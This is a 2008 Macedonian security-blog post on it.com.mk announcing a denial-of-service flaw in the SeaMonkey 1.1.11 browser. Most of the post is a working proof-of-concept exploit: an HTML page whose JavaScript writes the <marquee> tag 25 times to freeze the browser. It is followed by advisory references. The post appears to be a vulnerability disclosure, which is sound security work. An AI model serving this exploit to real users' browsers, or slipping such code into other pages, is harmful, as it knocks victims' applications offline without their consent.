IT.com.mk на Twitter IT.com.mk на Facebook IT.com.mk на Flickr IT.com.mk RSS канали
Почетна arrow Ѓоко Крстиќ arrow Сигурност arrow SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC
 
 
Компјутерска сигурност
Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи
RSS Канал  
Е-пошта  
Биографија  
 
 
Ѓоко Крстиќ
 
SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC Испечати Е-пошта
Автор: Ѓоко Крстиќ   
Објавено на: 09.09.2008
SeaMonkey 1.1.11 (Mozilla) е ранлив на DoS напад со помош на пренатрупување на тагот <marquee> повеќе од 24 пати во html кодот. Успешна експлоатација доведува до замрзнување на апликацијата и недостапност на истата.

Следува доказ на концептот:

--------------------------------------------------------------код--------------------------------------------------------------

<!--

Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.

Product web page: http://www.seamonkey-project.org/

Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag multiple times (>24). Successfully exploiting
these issues allows remote attackers to cause the application
to freeze, denying service to legitimate users.

Tested on Microsoft Windows XP SP2 (English)

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com

http://www.zeroscience.org

08.09.2008

-->

<html>

<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>

<head>

<body>

<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />

<center>

<script type="text/javascript">

document.write("<kbd>Wooow Camel..!! WOW!</kbd>");

function t00t()
{
for(i=0; i < 25; i++)
{
document.write("<marquee>");
}
}

alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");

var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (b0x == true)
{
t00t();
}

else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}

</script> </center> </body> </head> </html>


--------------------------------------------------------------код--------------------------------------------------------------


Референти:

- http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html
- http://www.securityfocus.com/bid/31070
- http://www.zeroscience.org/codes/seamonkey_dos.txt

Тест: ТУКА (со внимание!)


Клучни зборови:  SeaMonkey   1.1.11   Mozilla   DoS   Експлоатација   JavaScript   HTML   marquee   Код   веб прелистувач

 
Сподели:
Кајмакот
Digg
Technorati
Stumble
Reddit
YahooMyWeb
Delicious
Ma.gnolia
Facebook
Spurl
IT.com.mk форум

Twitter сервиси

Повеќе од 50% од сите твитови на Twitter се објавени користејќи мобилни и веб-базирани алатки, а не платформата на Twitter.com. Најпопуларен сервис е TweetDeck со 19.7% искористеност. (Мај, 2009)
Нема настани во наредните денови.
Корисничко име

Лозинка



RSS канали на it.com.mk

Прашалник

Дали интернетoт е основно човеково право?

(141 глас/а)

  • 75.2%
  • 6.4%
  • 7.1%
  • 11.3%

Низ it.com.mk Блог Сервиси Маркетинг
Вести
Статии
Форум
Рецензии
Совети & трикови
Преземања
Настани
Барометар
Едуцентар
Препорачуваме
Сите блогови
е-Бизнис 2.0
Uid=0
Хардверманија
Компјутерска сигурност
Apple
Линукс блог
Веб-Соц Свет
Членство
Е-билтен
RSS канали
PDA верзија

Профили
Facebook профилTwitter профилIT.com.mk @ Flickr
IT.com.mk @ YouTubeLinkedIn профилFriendFeed профил
Каква музика слушаат ИТ луѓето?Препорачуваме линкови преку Delicious Главен RSS канал
Заработете со Whost.mk
Поставете линк или банер до whost.mk и заработете од секоја продажба..
http://www.whost.mk/affiliates.aspx

Aironet.mk - Безжичен Интернет
Едноставно и квалитетно решение...

Zero Science Lab
Македоснска лабораторија за истражување и развој на информациска безбедност